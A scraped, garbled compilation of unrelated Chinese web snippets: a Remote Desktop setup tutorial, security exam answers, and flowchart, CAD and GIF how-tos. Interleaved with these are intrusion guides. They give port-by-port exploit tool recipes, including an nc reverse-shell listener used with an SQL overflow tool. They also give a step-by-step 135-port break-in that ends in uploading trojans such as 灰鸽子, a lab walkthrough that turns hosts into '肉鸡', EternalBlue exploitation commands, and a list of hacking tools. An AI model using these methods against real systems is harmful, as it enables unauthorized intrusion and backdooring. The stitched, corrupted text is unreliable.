我的花生壳 - 3389远程管理架设教程(图)

我的花生壳- 3389远程管理架设教程(图)

说到远程桌面就我理解其实就是在电脑B上查看电脑A的桌面并管理电脑A。比方说：如果我们的家里现在一般都是包月ADSL上网，如果我们的家里的电脑开通了远程桌面服务，那么，我们就可以在办公室通过远程桌面来远程进入我们在家里的电脑，并像坐在家里的电脑前一样的使用它。

下面我们就说说怎么来架设远程桌面，本教程适用于Windows Vista，Windows 2003，Windows XP。远程桌面默认的使用端口是3389端口。

首先我们右键我的电脑 - 属性

选择远程选项卡

在远程桌面项的允许用户远程连接到这台计算机（C）前打勾，如下图：

别管它，点击确定

点击应用并确定退出，至此，我们的远程桌面就配置好了。下面我们来连接试试看。

打开开始 - 程序 -附件 - 通讯 -远程桌面连接

在计算机名中填入127.0.0.1（自己的机器）

然后我们先来点开选项看看这个远程桌面连接工具吧，下图是常规项，我们可以在这里设置登录用户名和密码及域，并可以将此连接另存为一个快捷方式，以后再用的时候就可以直接双击打开连接了。

下图为显示项，我们可以调整远程桌面的显示分辨率和颜色数

下图为本地资源项，在这里我们可以通过勾选磁盘驱动器，来将你本机的磁盘带到远程电脑的系统中，相当于将你本地电脑的本地磁盘全部共享给了远程连接的电脑。

下图是程序项

下图是高级项

好了，看完了所有选项，为了便于我们观察，我们来把显示分辨率调整为640*480，如下图：

点击连接

默认我们没有设置Administrator的密码，所以我们直接点击确定

哈哈，看到了吗？由于帐户限制，您无法登陆！

知道问题在哪里吗？问题就在于你没有给Administrator设置密码，windows对于没有密码的管理员是不允许使用远程桌面的。知道了问题，我们找到Administrator并给它设置一个密码。如下图：

不管它，点击继续

网络安全技术简答题

第1章网络安全概述与环境配置 1. 网络攻击和防御分别包括哪些内容答：攻击技术主要包括以下几个方面。（1）网络监听：自己不主动去攻击别人，而是在计算机上设置一个程序去监听目标计算机与其他计算机通信的数据。（2）网络扫描：利用程序去扫描目标计算机开放的端口等，目的是发现漏洞，为入侵该计算机做准备。（3）网络入侵：当探测发现对方存在漏洞后，入侵到目标计算机获取信息。（4）网络后门：成功入侵目标计算机后，为了实现对“战利品”的长期控制，在目标计算机中种植木马等后门。（5）网络隐身：入侵完毕退出目标计算机后，将自己入侵的痕迹清除，从而防止被对方管理员发现。防御技术主要包括以下几个方面。（1）安全操作系统和操作系统的安全配置：操作系统是网络安全的关键。（2）加密技术：为了防止被监听和数据被盗取，将所有的数据进行加密。（3）防火墙技术：利用防火墙，对传输的数据进行限制，从而防止被入侵。（4）入侵检测：如果网络防线最终被攻破，需要及时发出被入侵的警报。（5）网络安全协议：保证传输的数据不被截获和监听。 2. 从层次上，网络安全可以分成哪几层每层有什么特点答：从层次体系上，可以将网络安全分成4个层次上的安全：物理安全，逻辑安全，操作系统安全和联网安全。物理安全主要包括5个方面：防盗，防火，防静电，防雷击和防电磁泄漏。

逻辑安全需要用口令、文件许可等方法来实现。操作系统安全，操作系统必须能区分用户，以便防止相互干扰。操作系统不允许一个用户修改由另一个账户产生的数据。联网安全通过访问控制服务和通信安全服务两方面的安全服务来达到。（1）访问控制服务：用来保护计算机和联网资源不被非授权使用。（2）通信安全服务：用来认证数据机要性与完整性，以及各通信的可信赖性。（感觉如果说是特点的话这样回答有点别扭。。） 3. 为什么要研究网络安全答：网络需要与外界联系，同时也就受到许多方面的威胁：物理威胁、系统漏洞造成的威胁、身份鉴别威胁、线缆连接威胁和有害程序威胁等。（可详细展开） 6. 网络安全橙皮书是什么包括哪些内容答：网络安全橙皮书是根据美国国防部开发的计算机安全标准——可信任计算机标准评价准则（Trusted Computer Standards Evaluation Criteria，TCSEC），1985年橙皮书成为美国国防部的标准，多年以来它一直是评估多用户主机和小型操作系统的主要方法。其他子系统（如数据库和网络）也一直用橙皮书来解释评估。橙皮书把安全的级别从低到高分成4个类别：D类、C类、B类和A类，每类又分几个级别，如表1-1所示。表1-1 安全级别

各个端口的入侵方法(入侵菜鸟必看)

各个端口的入侵方法（入侵菜鸟必看）1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破（字典是关键）最后SQLTools.exe入侵对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口sqlhelloF.exe 入侵ip 1433 本机ip 本机端口（以上反向的，测试成功） sqlhelloz.exe 入侵ip 1433 （这个是正向连接） 2. 4899端口入侵用4899过滤器.exe，扫描空口令的机器 3. 3899的入侵对很早的机器，可以试试3389的溢出(win3389ex.exe) 对2000的机器，可以试试字典暴破。(tscrack.exe) 4. 80入侵对sp3以前的机器，可以用webdav入侵；对bbs论坛，可以试试上传漏洞（upfile.exe或dvup_delphi.exe）可以利用SQL进行注入。（小榕的注入软件）。 5. serv-u入侵(21端口）对5. 004及以下系统，可用溢出入侵。（serv5004.exe）对5.1.0.0及以下系统，可用本地提升权限。（servlocal.exe）

====================================== 对serv-u的MD5加密密码，可以用字典暴破。（crack.vbs）输入一个被serv-u加密的密码（34位长），通过与字典档（dict.txt）的比较，得到密码。如：cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A 6. 554端口用real554.exe入侵。 7. 6129端口用DameWare6129.exe入侵。 8. 系统漏洞利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞，进行溢出入侵。 9. 3127等端口可以利用doom病毒开的端口，用nodoom.exe入侵。（可用mydoomscan.exe查）。 10. 其他入侵利用shanlu的入侵软件入侵（WINNTAutoAttack.exe）。各种端口的入侵方法1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPas*.**e 进行字典暴破（字典是关键）最后SQLTool*.**e入侵对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。

解决远程桌面无法连接问题实例说明

常见提示如下：客户端无法建立跟远程计算机的连接。导致这个错误的可能的原因是: 1) 远程计算机上的远程连接可能没有启用。 2) 已超出远程计算机上的连接最大数。 3) 建立连接时出现了一个网络错误。具体的解决办法：有时候是这个错误提示：由于网络错误，连接被中断，请重新连接到远程计算机远程连接我肯定是开启了的，防火墙里面3389端口也是打开的，并且连接其他的服务器就可以连接上，说明我本机没问题，用扫描软件，扫描了一下这个服务器，显示IP和端口都是存在的，说明这个服务器网络也没问题，实在没办法，只有不断的测试，后来在系统日志里面看到很多条系统错误信息。其中：严重错误“RDP 协议组件 "DA TA ENCRYPTION" 在协议流中发现一个错误并且中断了客户端连接。”引起了我的主要。几经周折得知这是因为Certificate子键负责终端服务通信中数据信息的认证和加密，它一旦被损坏，终端服务的协议组件就会检测到错误，中断客户机与终端服务器之间的通信。导致Certificate子键损坏的原因很多，如管理员安装和卸载某些系统软件、对终端服务参数的不合理配置等。这时我们需要重置该键值中的内容，才能修复终端服务。进入注册表编辑器窗口，展开“HKEY_LOCAL_MA CHINE\ SYSTEM\CurrentCon trolSet\Services\TermService\ Parame ters”，找到名为“Cer tificate”的子键，将它删除，重新启动XP系统或Windows 2000 Server服务器

，系统就会重新生成“Certificate”子键，这样客户端就能正常连接到终端服务器了。在终端服务器出现无法连接的问题后，我们首先要判断这是不是网络故障引起的，检测远程客户端和XP系统 (Windows 2000 Server服务器)是否能够正常连接到网络；然后就要检查终端服务器的加密级别是否设置过高。排除上述原因后，就有可能是“Certificate”子键损坏了。此外，“HKEY_LOCAL _MACHINE\ SYSTEM\Cur rentControlSet\Services\Term Service\Parameters”下的“X509 Certificate”和“X509 Certificate ID” 损坏了也有可能导致终端服务出现问题，它们的修复方法与“Certificate”子键损坏后的修复方法相同。讲开了，另外将其他几种远程连接的错误解决方法也附上，以方便需要的朋友：提示“本地计算机客户端访问许可不能升级或更新”的解决方法 1、打开被控机的注册表编辑器，定位到HKLM\SOFTWARE\Microsoft\MSLicensing。 2、备份MSLicensing键。 3、删除MSLicensing键，重启系统。提示“客户端无法连接到远程计算机”。远程计算机不可到达（ping不通或者被中途的园区网防火墙挡住），或是被控机防火墙没有开相应的端口，或是根本没有开启服务端。提示“远程计算机已结束连接”。的解决方法 1、打开被控机的注册表编辑器，定位到HKLM\SYSTEM\ControlSet001\Enum\Root\RDPDR，备份该项；右键单击该项，选择“权限”，为当前登录的用户增添“完全控制”的权限。 2、新建key文件，将以下内容写入，双击导入注册表后重启计算机即可。 Windows Registry Editor V ersion 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\RDPDR\0000] "ClassGUID"="{4D36E97D-E325-11CE-BFC1-08002BE10318}" "Class"="System" "HardwareID"=hex(7):52,00,4f,00,4f,00,54,00,5c,00,52,00,44,00,50,00,44,00,52,\ 00,00,00,00,00 "Driver"="{4D36E97D-E325-11CE-BFC1-08002BE10318}\\0030" "Mfg"="(标准系统设备)"

常用的端口入侵

21端口： 21端口是默认的FTP端口，利用方式：弱口令探测/溢出目前我还没看到远程溢出的，SERU的本地溢出漏洞风靡一时，曾经很多服务器就在沦丧于这个漏洞。 22端口 22端口是SSH远程登录协议，利用方式：弱口令探测 23端口 23端口是TLENET的默认端口，利用方式：弱口令探测/溢出一般大家用弱口令探测得比较多，但是成功率比较低，还是溢出来得快，毕竟权限高，想做什么都可以！ 25端口 25端口是SMTP协议的默认端口，邮件接收服务器。利用方式：溢出 53端口 53端口是DNS服务的默认端口，提供域名服务器，利用方式：溢出。这个今年很火，我试了一下，一晚上差不多可以溢出10W台开几抬肉鸡的话 79端口 79端口Finger服务的默认端口(查询远程主机在线用户等信息)，可以在辅助入侵中获取更多的主机信息。利用FINGER服务可以查询到主机很多敏感的信息，在入侵的时候常常可以起到意想不到的作用。

80端口 80端口是IIS的默认端口，全球信息网超文本传输协议(www)。利用方式：IIS溢出/SQL注入/旁注/跨站。不过一部分路由器的远程管理端口也是80。SQL注入大家已经很熟悉了吧，IIS溢出也只存在那些很老的机器上，看运气了。 110端口 110端口提供 Pop3 服务。邮件发送服务器。利用方式：溢出。 135端口 135端口提供查询服务。利用方式：IPC$(Internet Process Connection)入侵。网上教程非常多，不多说了。 137端口 137端口统共NetBIOS 数据报(UDP)服务。 139端口 139端口提供共享资源服务(NetBios-SSN)，用在IPC$入侵中。上面这三个端口可以综合利用。 161端口 161端口是远程管理设备(SNMP)的默认端口。这个很多小菜不知道怎么利用，那么重点来说说这个。 SNMP是简单网络管理协议，不清楚百度一下，很多小菜扫描出来了SNMP的弱口令，比如private,public等等，但是不知道怎么利用，这里介绍两款工具：IP NetWork browse 和LANguard NetWork Scnaner,这两个工具都可以扫描SNMP，而且可以扫描到，磁盘，服务，

端口对应表

端口：6970 服务：RealAudio 说明：RealAudio客户将从服务器的6970-7170的UDP端口接收音频数据流。这是由TCP-7070端口外向控制连接设置的。端口：7323 服务：[NULL] 说明：Sygate服务器端。端口：8000 服务：OICQ 说明：腾讯QQ服务器端开放此端口。' 端口：8010 服务：Wingate 说明：Wingate代理开放此端口。端口：8080 服务：代理端口说明：WWW代理开放此端口。端口：137 说明：SQL Named Pipes encryption over other protocols name lookup(其他协议名称查找上的SQL命名管道加密技术)和SQL RPC encryption over other protocols name lookup(其他协议名称查找上的SQL RPC加密技术)和Wins NetBT name service(WINS NetBT名称服务)和Wins Proxy都用这个端口。端口：161 说明：Simple Network Management Protocol(SMTP)（简单网络管理协议）端口：162 说明：SNMP Trap（SNMP陷阱）端口：21 服务：FTP 说明：FTP服务器所开放的端口，用于上传、下载。最常见的攻击者用于寻找打开anonymous的FTP服务器的方法。这些服务器带有可读写的目录。木马Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash 和Blade Runner所开放的端口。端口：22 服务：Ssh 说明：PcAnywhere建立的TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点，如果配置成特定的模式，许多使用RSAREF库的版本就会有不少的漏洞存在。端口：23 服务：Telnet 说明：远程登录，入侵者在搜索远程登录UNIX的服务。大多数情况下扫描这一端口是为了找到机器运行

135端口入侵的方法(简单)

135端口入侵的方法(简单) （1）通过135端口入侵，攻击者首先需要查找网络上存在135端口漏洞的主机地址，在查找此类主机过程中，可以使用一些扫描工具，比如SuperScan就是典型的端口工具之一。在SuperScan“开始”文本框中输入需要扫描的起始地址，然后在“结束”文本框里填写好扫描结束的IP地址，在“扫描类型”选项中选择“所有端口定义”单选按钮，并在右侧的文本框中输入“135”。再点击“开始”按钮即可开始扫描。扫描结束后，在下方的列表中可以查看目标主机打开的端口。然后再点击“Save”按钮选好保存路径，把里面有漏洞的IP整理下即可。（2）得到有漏洞后，我们还有一个功能强大的扫描工具，比如NTSscn汉化版。然后在“主机文件“处点击“打开”按钮找到我们刚才保存的IP路径，在连接共享$处选择“WMI扫描”，在“扫描打开端口的主机”处填写135端口。最后点击“开始”即可。要不了多久就会有结果显示。（3）获得漏洞主机用户名以后，我们需要一个开启的工具，那就是Recton v2.5。好了，万事具备之欠那“东风”拉。把刚刚扫描的IP输入TELNET界面的“远程主机”处，以及用户名和密码，不过一般情况下密码都是空。下一步点击“开始执行”按钮等待把TELNET打开吧。打开后按WIN+R输入CMD进入再输入Telnet IP 回车，会提示让你输入用户名，把用户名输入后，回车即可进入主机。而且得到的还是SYSTEM 权限。下一步就是为我们加了拥有管理员权限的用户，看看我杰作。最后我们可以上传一些远程性木马软件作为后门，比如灰鸽子，冰河等。在这里我就不在展示。我还是喜欢3389端口，那我就给他上传个开启3389的脚本，不过对于开启3389端口的工具网上还真的不少，比如Recton v2.5就有这个功能。好了3389端口已经成功开启大家看我连接的

cad里面动态块的制作教程

cad里面动态块的制作教程创建CAD动态块的一般步骤将一个或多个单一的实体对象整合为一个对象，这个对象就是图块。图块中的各实体可以具有各自的图层、线性、颜色等特征。在应用时，图块作为一个独立的、完整的对象进行操作，可以根据需要按一定比例和角度将图块插入到需要的位置。向块中添加参数集与添加参数所使用的方法相同。参数集中包含的动作将自动添加到块定义中，并与添加的参数相关联。接着，必须将选择集（几何图形）与各个动作相关联。首次向动态块定义添加参数集时，每个动作旁边都会显示一个黄色警告图标。这表示需要将选择集与各个动作相关联。可以双击该黄色警示图标，然后按照命令行上的提示将动作与选择集相关联。如果插入的是查寻参数集，双击黄色警示图标时将会显示“特性查寻表”对话框。与查寻动作相关联的是添加到此表中的数据，而不是选择集。为了得到高质量的动态块，提高块的效率，避免重复修改，我们一般可以通过以下几个步骤完成动态块的创建。

步骤1：规划在创建动态块之前，有必要对动态块进行必要的规划，规划动态块要实现的功能、外观，在图形中的使用方式，以及要实现预期功能需要使用哪些参数和动作。步骤2：绘制几何图形绘制动态块中所包含的基本图元，当然，这些图元也可以在块器中绘制。步骤3：添加参数和动作这是动态块创建过程中最关键的环节，参数和动作的不但要考虑到动态块功能的实现，同时也要考虑到动态块的可读性及修改的方便性，尽可能将参数的作用点吸咐在对应的图元上，且动作应摆放在其关联参数附近，参数和动作较多时还需要为其重命名，以便理解、和修改。步骤4：测试动态块保存并退出块器后，对动态块进行效果测试，检测是否能达到预期的效果。

常用黑客工具(网络入侵工具)

常用黑客工具（网络入侵工具）一、扫描工具 X-scan 3.1 焦点出的扫描器，国内最优秀的安全扫描软件之一!非常专业的一个扫描器! X-way 2.5 这也上一个非常不错的扫描器哦!功能非常多!使用也不难,入侵必备工具! SuperScan 3.0 强大的TCP 端口扫描器、Ping 和域名解析器! Namp 3.5 这个就厉害了,安全界人人皆知的非常有名气的一个扫描器!作者Fyodor Hscan v1.20 这是款运行在Win NT/2000下的漏洞扫描工具，有GUI以及命令行两种扫描方式! SSS 俄罗斯安全界非常专业的一个安全漏洞扫描软件! U-Scan.exe 非常好的UNICODE漏洞扫描工具! RpcScan V1.1 可以通过135端口枚举远程主机RPC连接信息! SHED 1.01 一个用来扫描共享漏洞的机器的工具! DSScan V1.00 ms04-011 远程缓冲区溢出漏洞扫描专用! Dotpot PortReady1.6 该软件为“绿色软件”，无需安装，非常小巧（仅23KB），具有极快的扫描速度! WebDAVScan v1.0 针对WEBDA V漏洞的扫描工具! 注意:该软件解压缩时会被查杀! Socks Proxy Finder2 扫描端口速度非常快的一个工具,扫描完毕后还可以导出保存起来! SQLScan v1.2 猜解开着1433端口的住机密码工具! RPC漏洞扫描器v1.03 针对RPC漏洞扫描的工具! 流光5.0 破解版国内大名鼎鼎的黑客扫描工具,由高级程序员小榕编写! 自动攻击探测机Windows NT/2000 自动攻击探测机 4899空口令探测能够快速的扫描到被安装了radmin服务端4899端口的空口令IP! 二、远程控制

流程图绘制方法

附录一：流程图绘制方法（一）选用流程图的符号国际上通用的一种流程图是“矩阵式流程图”，这种流程图分成纵、横向两个方向，纵向表示工作的先后顺序，横向则表示承担该项工作的部门和职位，通过纵、横两个方向的坐标，就可以达到流程管理的要求，既解决了先做什么、后做什么的顺序问题，又解决了由谁来做的责任问题。在流程图中，不同的符号有不同的含义，在企业内部应统一使用。对于矩阵式流程图，美国国家标准学会（ANSI）规定出如下管理流程设计标准符号。 1. 流程的开始或结束，用椭圆来表示。 2. 具体任务或工作，用矩形来表示。 3. 需要决策的事项，用菱形来表示。 4. 流程线，用带箭头的直线来表示。 5. 信息来源，用倒梯形来表示。 6. 信息储存与输出，用平行四边形来表示。流程设计常用符号如图9-1所示。椭圆——流程的开始或结束矩形——具体任务或工作菱形——需要决策的事项带箭头的直线——流程线倒梯形——信息来源平行四边形——信息储存与输出图9-1 流程图常用符号示例

实际上，管理流程设计的标准符号远不止上述所列的。为了使流程图简洁、明了，企业可根据实际需要，使用其中的一部分即可。一般情况下，只使用1-4项规定的4种符号就基本可以满足绘制流程图的需要了。（二）流程图的绘制说明 1. 流程图的纵、横坐标短阵式流程图分成纵、横两个方向，纵向表示工作的先后顺序，横向表示承担该项工作的部门和职位，从图的左上角开始，职位级别从高到低排列。通过纵、横两个方向的坐标，就可以将某项业务工作明确定位，使业务流程一目了然。 2. 流程图的层次级别一般来说，物业公司的流程图可分为一、二、三级。（1）一级流程图即企业级的流程图，如企业经营决策流程图、主导业务流程图等。（2）二级流程图即部门级的流程图，如秩序管理流程图、环境管理流程图、人力资源管理流程图等。（3）三级流程图即部门内具体工作的流程图，如业主入住管理流程图、物业报修服务流程图、物业费用收缴流程图等。流程图应该是环环相套的。上一个级别的流程图中的一个节点，到下一个级别可能就会演化成一张流程图。 3. 绘制流程图的注意事项绘制流程图时，企业一般要注意以下七个方面。

黑客常用的几种入侵端口的方法

【托管服务qin】黑客常用的几种入侵端口的方法服务器托管, BGP, 光钎专线, 防火墙, 新一代IDC 工欲善其事，必先利其器，本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法，希望能对大家有所帮助，以助于大家能更好地防御黑客的攻击。" ^' D( E3 K! N) ^! c 1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破（字典是关键）7 L5 a9 T" E: C& x' k* C 最后SQLTools.exe入侵4 r+ F" q g9 j- K9 m* x4 o' E =============================2 z0 ~3 T) K5 n8 W; Z 对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口sqlhelloF.exe 入侵ip 1433 本机ip 本机端口（以上反向的，测试成功）) Q) Q7 K+ L! J$ o6 Z9 w( a sqlhelloz.exe 入侵ip 1433 （这个是正向连接）% J3 L6 x8 y: t; p 2. 4899端口入侵9 `" f0 r# k2 ^: F 用4899过滤器。exe，扫描空口令的机器 3. 3899的入侵对很早的机器，可以试试3389的溢出（win3389ex.exe）对2000的机器，可以试试字典暴破。（tscrack.exe）* X8 }: O! |2 }& x7 M 4. 80入侵+ J9 [0 L4 _) B! K 对sp3以前的机器，可以用webdav入侵；

制作工作流程图

步骤一：页面和段落的设置为了流程图有较大的绘制空间，我们先来设置一下页面。 1．启动Word 2003，打开一个空白文档，并切换到页面视图。选择菜单“文件→页面设置”命令，打开“页面设置”对话框，在“页边距”选项卡中，设置上下边距为“1厘米”，左右边距为“2厘米”(图2)，完成后单击“确定”按钮。 2．由于后面要在自选图形中输入文字，为了让输入的文字在垂直方向上看起来居中，这里顺便设置一下段前距。选择菜单“格式→段落”命令，打开“段落”对话框，在“缩进和间距”选项卡中设置段前间距为“1行”，完成后单击“确定”(图 3)。

步骤二：制作流程图的标题基本工作环境设置好之后就开始制作流程图的标题。大家看到的最终效果中的标题是放在一个矩形自选图形中的，下面开始制作。 1．在窗口Word窗口底部的自选图形工具栏中选择“矩形”按钮(图 4)。 2．这时可以在页面中看到“在此创建图形”的画布，接着拖动鼠标，在该画布中绘制矩形，让矩形的宽度与画布相同，高度可参照最终效果图，约3厘米。

3．画好后调整画布的高度，使之与矩形的高度相同(图 5)。 4．接下来选中插入的矩形，单击鼠标右键，在弹出的菜单中选择“设置自选图形格式”命令，打开“设置自选图形格式”对话框，在“颜色与线条”选项卡中，先设置线条颜色为“无线条颜色”，接着单击“填充”区“颜色”下拉箭头，选择“其它颜色”命令，打开“颜色”对话框，参照下图设置填充颜色(图6)，完成后依次单击两次“确定”。 5．接下来在矩形框中插入艺术字标题。选中矩形框，单击鼠标右键，在弹出的菜单中选择“添加文字”命令，这时可以看到光标在矩形框内闪动，表示等待添加文字。

流程图制作规范

教育部作业标准化（SOP）流程图制作规范秘书室管考科制 931009 壹、前言「标准作业流程」是企业界常用的一种作业方法。其目的在使每一项作业流程均能清楚呈现，任何人只要看到流程图，便能一目了然。作业流程图确实有助于相关作业人员对整体工作流程的掌握。制作流程图的好处有三：（一）所有流程一目了然，工作人员能掌握全局。（二）更换人手时，按图索骥，容易上手。（三）所有流程在绘制时，很容易发现疏失之处，可适时予以调整更正，使各项作业更为严谨。贰、目的一、为建立本部作业标准化（SOP）流程图之可读性及一致性，乃参考美国国家标准协会（American National Standards Institute, ANSI）系统流程图标准符号，选定部份常用图形，作为本规范流程图制作符号；及参考道勤企业管理顾问有限公司「效率会议」标准流程，作为本规范流程作业要项及流程图之范例。二、本规范对于流程图绘制方式，采用由上而下结构化程序设计（Top-down Structured Programming）观念，亦即流程图的结构，由循序、选择及重复三种结构所组成，以制作一个简单、易懂及便于维护、修改的流程图。三、对于制作流程图共通性目标，本规范亦列出流程图绘制原则。参、流程图符号可由计算机的Word 软件中，工具列─插入─图片─快取图案─流程图，选取各种图示绘制；其中最常用者，有下列八种，说明如下：

肆、流程图结构说明：一、循序结构（Sequence）（一）图形：（二）意义：处理程序循序进行。（三）语法：DO 处理程序1 THEN DO 处理程序2 （四）实例：

工艺流程图标准绘制方法

工艺流程图绘制方法——PID图 PID图图纸规格采用1号图纸规格（594 mm×841 mm），并用多张1号图分开表示。每张图纸的有关部分均应相互衔接，完善地表示出整个生产过程。少数物流和控制关系来往密切且内容较多，表示在一张1号图中太挤的情况下，可按图纸延长的标准加长1/4或1/2。 PID图的内容应根据工艺流程图和公用工程流程图的要求，详细地表示装置的全部设备、仪表、管道和其他公用工程设施，具体内容如下： a) 全部设备； b) 全部仪表（包括控制、测量及计算机联结）； c) 所有管道、阀门（低高点放空除外）、安全阀、大小头及部分法兰； d) 公用工程设施、取样点、吹扫接头； e) 工艺、仪表、安装等特殊要求。 PID图中设备画法编号例如E-1由三台换热器并联操作，其编号分别为E-1A，E-1B，E-1C（或E-1A/B/C）；如P-1为两台泵（一台操作，一台备用），其编号为P-1A，P-1B（或P-1A/B）。用细实线画出装置全部操作和备用的设备，在设备的邻近位置（上下左右均可）注明编号（下画一粗实线）、名称及主体尺寸或主要特性。编号及名称应与工艺流程图相一致，编号方法与“工艺流程图”2.4.2规定相同。但同一作用的设备由多台组成（或备用）时，可在编号数字后加A，B，C。设备的主体尺寸或特性的标注方法按不同外型或特性规定如下： a) 立式圆筒型：内径ID×切线至切线高T/T，mm， b) 卧式圆筒型：内径ID×切线至切线长T/T，mm， c) 长方型：长×宽×高，mm， d) 加热及冷换设备：标注编号、名称及其特性（热负荷、及传热面积） e) 机泵，设备大小可不按比例画，但应尽量有相对大小的概念，有位差要求的设备，应表示其相对高度位置，例如热旁路控制流程中的冷凝器和回流罐。设备内部构件的画法与PFD图规定要求相同。相同作用的多台设备应全部予以表示，并按生产过程的要求表示其并联或串联的操作方式。对某些需要满足泵的汽蚀余量或介质自流要求的设备应标注其离地面的高度，一般塔类和某些容器均有此要求。对于落地的立式容器，该尺寸要求也可直接表示在相关数据表设备简图中。 PID图中管道画法装置内所有操作、开停工及事故处理等管道及其阀门均应予表示，并用箭头表示管内物料的流向。主要操作管道用粗实线表示，备用管道、开停工及事故处理管道、其他辅助管道均用细实线表示。装置内的扫线、污油排放及放空管道只需画出其主要的管道及阀门，并

永恒之蓝3389漏洞原理详解解析

实验环境 ?操作机：Windows XP o IP : 172.16.11.2 ?操作机：Kali Linux o IP : 172.16.12.2 ?目标机：Windows 7 64位 o IP : 172.16.12.3 ?目标机：Windows Server 2003 o IP : 172.16.12.4 ?掌握工具的用法以及临时防御措施实验步骤实验工具 ?Metasploit：是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。这些功能包括智能开发，代码审计，Web应用程序扫描，社会工程等 ?Equation Group Tools：这是一个集成的工具包，里面包含了IIS6.0、445端口、3389端口、Rootkit等远程利用工具，本次试验我们主要用到它的445端口远程入侵功能，以及3389远程端口入侵功能。实验内容 Shadow Brokers再次暴露出一份震惊世界的机密文档，其中包含了多个W indows 远程漏洞利用工具，可以覆盖大量的Windows 服务器，一夜之间所有Windows服务器几乎全线暴露在危险之中，任何人都可以直接下载并远程攻击利用，考虑到国内不少高校、政府、国企甚至还有一些互联网公司还在使用W indows 服务器，这次事件影响力堪称网络大地震。影响版本

全球70% 的Windows 服务器，包括Windows NT、Windows 2000、Windo ws XP、Windows 2003、Windows Vista、Windows 7、Windows 8，Windows 200 8、Windows 2008 R2、Windows Server 2012 SP0 危害攻击者通过执行脚本，使目标主机蓝屏重启，获取Windows目标主机权限，对目标机器进行任意操作，攻击成本和利用条件都很低，只需在本地执行脚本，并设置相关参数。一旦攻击成功，攻击者能直接控制目标主机，甚至直接下载数据库，盗取商业机密，很多的政府、事业单位都会受到影响，影响极大，危害不言而喻。步骤1：利用Eternalblue与Doublepulsar插件，验证445 SMB漏洞我们本步骤利用Eternalblue和Doublepulsar这两个"插件"来获取Windows 7 64位的系统权限。其中Eternalblue可以利用SMB漏洞，获取Windows 7 系统权限而Doublepulsar可以加载Metasploit生成的恶意DLL。我们首先进入cmd命令行，在命令行中进入文件夹： cd C:\EQGRP_Lost_in_Translation-master/Windows 输入命令： fb.py //运行python文件注：在一般情况下需要在工具根目录下创建listeningposts文件夹，否则运行文件时，会报错。接下来依次填入对应信息： 172.16.12.3//目标IP 172.16.11.2//本地IP no //取消重定向 c:\logs //指定日志文件目录

制作高清GIF图教程【GIF制作教程】

制作高清GIF图教程【GIF制作教程】首先，需要两个软件，分别是Potplayer，这是个播放器，免费的，可以去百度一下，很容易找到，找到合适自己电脑的版本，就装进电脑吧。主要是分64位和32位两个版本，楼主我就是苦逼的XP。。。。。。←就是它另一个是Photoscape，这软件也很好找，是个适合初学者用的简单的GIF合成软件。 ←就是它。首先我们用Potplayer打开要截取的视频。打开视频之后找到要截取的画面后，按Ctrl+G可以打开这个截图的文件夹，顶上可以设置

截取的图片路径，其他可以和我做一样的设置，尺寸设置一栏可以选择原始尺寸，但是如果截取很卡，可以改为自定义尺寸。需要字幕的话可以点上同时截取字幕。并在右键菜单字幕设置中选择非图层输出。

这里还有一点很重要的是帧设置，截取帧数可以设置大一点，因为可以随时开始停止所以设置1000或10000都没关系，重要的是截取间隔，如果想要时间截取的长一点，可以像楼上那张图一样设置成100，要让画面更流畅，可以设置成70-80左右。 PS，不推荐50或者以下，因为如果间隔太小，一个是会大大缩减截取时间，一个是会截取很多相同的帧，而且帧数过高经证明会有浏览器出现卡顿现象。点击开始就可以开始截图了，点击停止就能停止连续截图，这里就不上图解释了。接下来我们打开截图文件夹。

就像这样，按住Ctrl来多选。选中所有的要做成GIF的图片。接下来打开Photoscape来合成GIF图片。找到四点钟方向的GIF动画，打开。然后打开截图文件夹，点住要做GIF的第一张（也就是楼上那张图里面第一行从右往左数第二张，这很重要。）拖入下图所示的位置。

135端口入侵

实验5 135端口入侵一、实验目的通过这项实验旨在使学生对135端口入侵有一定的了解，提高同学们的安全意识，掌握配置安全系统的能力。二、实验任务任务性质：黑客攻防三、任务描述：扫描局域网中开放的135端口，运用工具，开启telnet服务，登录对方主机，放入木马。四、任务步骤：（1）用x-san扫描主机，发现开启135端口主机；（2）用ntscan扫描开启135端口主机，telnet登录密码是否为空；（3）发现telnet登录密码为空的主机，用recov启动telnet服务；（4）建立ftp服务器，将木马放入ftp服务器；（5）通过telnet登录ftp服务器，将木马上传上目标主机，并运行；（6）肉鸡完成。五、总结关闭135端口，445端口，139端口，3389端口的方法。端口关闭前查看开启端口：

1、关闭445端口经过注册表更改 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\NetBT\Parameters] [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\NetBT\Parameters] 在“Parameters”项上，右键单击，选择“新建”——“DWORD值”。将DWORD值命名为“SMBDeviceEnabled”。右键单击“SMBDeviceEnabled”值，选择“修改”。在“数值数据”下，输入“0”，单击“确定”按钮。 2、关闭135端口经过注册表更改（1）在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole] 项中把EnableDCOM的值改为“N” （2）在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc] 项中把DCOM Protocols 键值中删除 “ncacn_ip_tcp” （3）停用“Distributed Transaction Coordinator”服务 3、关闭3389 端口（1）在我的电脑上点右键选属性-->远程，将里面的远程协助和远程桌面两个选项框里的勾去掉

远程电脑3389端口入侵+工具

